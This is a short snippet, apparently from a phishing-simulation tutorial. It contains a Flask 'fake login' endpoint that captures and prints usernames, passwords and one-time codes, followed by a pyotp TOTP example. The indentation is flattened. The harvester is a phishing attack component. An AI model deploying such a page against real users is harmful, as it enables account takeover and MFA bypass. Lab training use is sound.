# Example: Simulate a phishing page (DO NOT use maliciously)
from flask import Flask, request
app = Flask(__name__)
@app.route('/login', methods=['POST'])
def fake_login():
username = request.form.get('username')
password = request.form.get('password')
otp = request.form.get('otp')
print(f"Captured: Username={username}, Password={password}, OTP={otp}")
return "Login successful (simulated)"
if __name__ == '__main__':
app.run(debug=True)
Note: Always test in isolated labs or with permission.
import pyotp
# Generate a TOTP
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)
print("Current OTP:", totp.now())
(Install with pip install pyotp)